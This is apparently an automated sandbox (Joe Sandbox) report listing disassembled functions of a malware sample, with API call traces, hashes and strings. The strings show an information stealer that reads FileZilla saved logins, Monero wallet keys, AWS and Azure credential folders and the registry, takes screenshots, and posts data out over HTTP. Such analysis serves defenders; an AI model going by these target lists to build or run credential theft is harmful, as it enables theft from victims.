                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 1942843190-555421843
                    • Opcode ID: 39805b755a2160c4831d649ea8db1dc192dbb37f2cb4e9fc939f2b09a773bb8c
                    • Instruction ID: 77d4a90861eb36c463b2d7816a833c8758c512c0852eec9eb268b4ca0683eb8b
                    • Opcode Fuzzy Hash: 39805b755a2160c4831d649ea8db1dc192dbb37f2cb4e9fc939f2b09a773bb8c
                    • Instruction Fuzzy Hash: F8D10F729102089BCB04EBE4DD96EEE7778EF94700F548519F106B7091EE74AA05CFA5
                    Function 00955960 Relevance: 42.5, APIs: 17, Strings: 7, Instructions: 495networkstringmemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954839
                      • Part of subcall function 009547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954849
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009559F8
                    • StrCmpCA.SHLWAPI(?,005BE8F8), ref: 00955A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00955B93
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,005BE868,00000000,?,005BA990,00000000,?,00971A1C), ref: 00955E71
                    • lstrlen.KERNEL32(00000000), ref: 00955E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00955E93
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00955E9A
                    • lstrlen.KERNEL32(00000000), ref: 00955EAF
                    • lstrlen.KERNEL32(00000000), ref: 00955ED8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00955EF1
                    • lstrlen.KERNEL32(00000000,?,?), ref: 00955F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00955F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00955F4C
                    • InternetCloseHandle.WININET(00000000), ref: 00955FB0
                    • InternetCloseHandle.WININET(00000000), ref: 00955FBD
                    • HttpOpenRequestA.WININET(00000000,005BE818,?,005BE380,00000000,00000000,00400100,00000000), ref: 00955BF8
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • InternetCloseHandle.WININET(00000000), ref: 00955FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------$H[$h[
                    • API String ID: 874700897-3339449755
                    • Opcode ID: 9f2dba45b011f7d8e6ce95f9cf56f0df7acf42067fe593f7efba3ed50d55252e
                    • Instruction ID: f2f30d11f628d1c3213a44d6047a5f8e6c0760d64d47f9035fb9a796bf23b373
                    • Opcode Fuzzy Hash: 9f2dba45b011f7d8e6ce95f9cf56f0df7acf42067fe593f7efba3ed50d55252e
                    • Instruction Fuzzy Hash: AD12DE72820118ABDB15EBA0DD96FEEB378BF94700F504199B50A73091EF706E4ACF65
                    Function 0095CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 00968B60: GetSystemTime.KERNEL32(00970E1A,005BA900,009705AE,?,?,009513F9,?,0000001A,00970E1A,00000000,?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 00968B86
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095CF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0095D0C7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0095D0CE
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D208
                    • lstrcat.KERNEL32(?,00971478), ref: 0095D217
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D22A
                    • lstrcat.KERNEL32(?,0097147C), ref: 0095D239
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D24C
                    • lstrcat.KERNEL32(?,00971480), ref: 0095D25B
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D26E
                    • lstrcat.KERNEL32(?,00971484), ref: 0095D27D
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D290
                    • lstrcat.KERNEL32(?,00971488), ref: 0095D29F
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D2B2
                    • lstrcat.KERNEL32(?,0097148C), ref: 0095D2C1
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D2D4
                    • lstrcat.KERNEL32(?,00971490), ref: 0095D2E3
                      • Part of subcall function 0096A820: lstrlen.KERNEL32(00954F05,?,?,00954F05,00970DDE), ref: 0096A82B
                      • Part of subcall function 0096A820: lstrcpy.KERNEL32(00970DDE,00000000), ref: 0096A885
                    • lstrlen.KERNEL32(?), ref: 0095D32A
                    • lstrlen.KERNEL32(?), ref: 0095D339
                      • Part of subcall function 0096AA70: StrCmpCA.SHLWAPI(005B8FC8,0095A7A7,?,0095A7A7,005B8FC8), ref: 0096AA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 0095D3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                    • String ID:
                    • API String ID: 1956182324-0
                    • Opcode ID: d7f17f4b3edda48d85aa0117ee94c520ec046ef0573d82463ccceb9f36fa9642
                    • Instruction ID: 5313db9e71f8297316e8cd7f19650d3248b4424f4ebd5be40caea55fc982c327
                    • Opcode Fuzzy Hash: d7f17f4b3edda48d85aa0117ee94c520ec046ef0573d82463ccceb9f36fa9642
                    • Instruction Fuzzy Hash: 9DE1EC72910108ABCB04FBA4DE96FEE7379AF94305F104159F506B70A1DE35AE09CFA6
                    Function 00954880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954839
                      • Part of subcall function 009547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954849
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00954915
                    • StrCmpCA.SHLWAPI(?,005BE8F8), ref: 0095493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00954ABA
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00970DDB,00000000,?,?,00000000,?,",00000000,?,005BE7F8), ref: 00954DE8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00954E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00954E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00954E49
                    • InternetCloseHandle.WININET(00000000), ref: 00954EAD
                    • InternetCloseHandle.WININET(00000000), ref: 00954EC5
                    • HttpOpenRequestA.WININET(00000000,005BE818,?,005BE380,00000000,00000000,00400100,00000000), ref: 00954B15
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • InternetCloseHandle.WININET(00000000), ref: 00954ECF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 460715078-2180234286
                    • Opcode ID: b57d0a6b1ee22da691adadfdf041ea90df4a5a53b2ab67ecab5b45d514f9d126
                    • Instruction ID: 8a5970de00114b55b74eb55103c2b1e2b128c72c415fa45afdfe46fba47e898a
                    • Opcode Fuzzy Hash: b57d0a6b1ee22da691adadfdf041ea90df4a5a53b2ab67ecab5b45d514f9d126
                    • Instruction Fuzzy Hash: 9212CD72910218AADB15EB90DDA2FEEB779BF94300F504199B10673091EF706F49CFA6
                    Function 0095C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,005BCF00,00000000,?,0097144C,00000000,?,?), ref: 0095CA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0095CA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0095CA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0095CAA8
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0095CAD9
                    • StrStrA.SHLWAPI(?,005BD080,00970B52), ref: 0095CAF7
                    • StrStrA.SHLWAPI(00000000,005BD0E0), ref: 0095CB1E
                    • StrStrA.SHLWAPI(?,005BDB60,00000000,?,00971458,00000000,?,00000000,00000000,?,005B9038,00000000,?,00971454,00000000,?), ref: 0095CCA2
                    • StrStrA.SHLWAPI(00000000,005BDC00), ref: 0095CCB9
                      • Part of subcall function 0095C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0095C871
                      • Part of subcall function 0095C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0095C87C
                    • StrStrA.SHLWAPI(?,005BDC00,00000000,?,0097145C,00000000,?,00000000,005B9098), ref: 0095CD5A
                    • StrStrA.SHLWAPI(00000000,005B9228), ref: 0095CD71
                      • Part of subcall function 0095C820: lstrcat.KERNEL32(?,00970B46), ref: 0095C943
                      • Part of subcall function 0095C820: lstrcat.KERNEL32(?,00970B47), ref: 0095C957
                      • Part of subcall function 0095C820: lstrcat.KERNEL32(?,00970B4E), ref: 0095C978
                    • lstrlen.KERNEL32(00000000), ref: 0095CE44
                    • CloseHandle.KERNEL32(00000000), ref: 0095CE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                    • String ID:
                    • API String ID: 3744635739-3916222277
                    • Opcode ID: 9f062f5b7879a89c9ae7ed82f6599d168377beb0bb2ba268f74a975fea84b960
                    • Instruction ID: 6d1e898c70ab700e6bc8aecb65aef2837de4de53637f3940c1b75c0746610550
                    • Opcode Fuzzy Hash: 9f062f5b7879a89c9ae7ed82f6599d168377beb0bb2ba268f74a975fea84b960
                    • Instruction Fuzzy Hash: 19E11D72900108ABDB14EFA4DD92FEEB778AF94300F10415AF50677191EF346A4ACFA6
                    Function 00968320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • RegOpenKeyExA.ADVAPI32(00000000,005BB4C8,00000000,00020019,00000000,009705B6), ref: 009683A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00968426
                    • wsprintfA.USER32 ref: 00968459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0096847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0096848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00968499
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: f82a2baa93460e01af7004512a0abd93ed39f00a78f0cfc293b6f479751df117
                    • Instruction ID: 9b696bf2dde7a41da09d9f04330160d6a46819712465cdfdef7a3ea5d7743b38
                    • Opcode Fuzzy Hash: f82a2baa93460e01af7004512a0abd93ed39f00a78f0cfc293b6f479751df117
                    • Instruction Fuzzy Hash: F081E8B1910118ABDB24DB64CD95FEAB7B8BF48700F008699E109A7180DF756B85CFE5
                    Function 009612D0 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 310COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen
                    • String ID: [$[
                    • API String ID: 2001356338-2812584724
                    • Opcode ID: 3e8019992afa0009b1537083337dbac8e6b331abac13a07ff6b243431e0b9c22
                    • Instruction ID: 2b0a66855effd9c7e085e174a75264b6ae4a63dd1ff41f3f5e24d1cdb37af8a7
                    • Opcode Fuzzy Hash: 3e8019992afa0009b1537083337dbac8e6b331abac13a07ff6b243431e0b9c22
                    • Instruction Fuzzy Hash: 05C1B8B59002199BCB14EF60DD99FEE7378BFA4304F004599F50AA7281EF74AA85CF91
                    Function 00969010 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 184COMMON
                    Download Yara Rule
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0096906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: P[$image/jpeg
                    • API String ID: 2244384528-2606885200
                    • Opcode ID: a50e5d655062160b01ad41a7edbd3ee64de19d34110f07f52bfebb31842e800e
                    • Instruction ID: acef942bfff3929c80e1a6d5703e609404529973aff4707249b4891215451946
                    • Opcode Fuzzy Hash: a50e5d655062160b01ad41a7edbd3ee64de19d34110f07f52bfebb31842e800e
                    • Instruction Fuzzy Hash: 6171CEB5910208ABDB04EFE4DD99FEEB7B9BF88700F108509F515A7290DF74A905CBA1
                    Function 00964D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00968DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00968E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00964DB0
                    • lstrcat.KERNEL32(?,\.azure\), ref: 00964DCD
                      • Part of subcall function 00964910: wsprintfA.USER32 ref: 0096492C
                      • Part of subcall function 00964910: FindFirstFileA.KERNEL32(?,?), ref: 00964943
                    • lstrcat.KERNEL32(?,00000000), ref: 00964E3C
                    • lstrcat.KERNEL32(?,\.aws\), ref: 00964E59
                      • Part of subcall function 00964910: StrCmpCA.SHLWAPI(?,00970FDC), ref: 00964971
                      • Part of subcall function 00964910: StrCmpCA.SHLWAPI(?,00970FE0), ref: 00964987
                      • Part of subcall function 00964910: FindNextFileA.KERNEL32(000000FF,?), ref: 00964B7D
